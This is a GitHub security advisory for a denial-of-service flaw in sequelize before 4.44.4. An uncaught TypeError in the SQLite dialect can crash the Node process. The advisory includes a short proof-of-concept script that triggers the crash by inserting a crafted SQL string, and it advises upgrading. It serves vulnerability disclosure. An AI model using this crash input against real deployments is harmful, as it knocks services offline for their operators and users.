Skip to content

Denial of Service in sequelize

Moderate severity GitHub Reviewed Published Sep 3, 2020 to the GitHub Advisory Database • Updated Apr 11, 2023

Package

npm sequelize (npm)

Affected versions

< 4.44.4

Patched versions

4.44.4

Description

Versions of sequelize prior to 4.44.4 are vulnerable to Denial of Service (DoS). The SQLite dialect fails to catch a TypeError exception for the results variable. The results value may be undefined and trigger the error on a .map call. This may allow attackers to submit malicious input that forces the exception and crashes the Node process.

The following proof-of-concept crashes the Node process:

const Sequelize = require('sequelize');

const sequelize = new Sequelize({
	dialect: 'sqlite',
	storage: 'database.sqlite'
});

const TypeError = sequelize.define('TypeError', {
	name: Sequelize.STRING,
});

TypeError.sync({force: true}).then(() => {
	return TypeError.create({name: "SELECT tbl_name FROM sqlite_master"});
});

Recommendation

Upgrade to version 4.44.4 or later.

References

Reviewed Aug 31, 2020
Published to the GitHub Advisory Database Sep 3, 2020
Last updated Apr 11, 2023

Severity

Moderate

Weaknesses

CVE ID

No known CVE

GHSA ID

GHSA-fw4p-36j9-rrj3

Source code

No known source code
Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.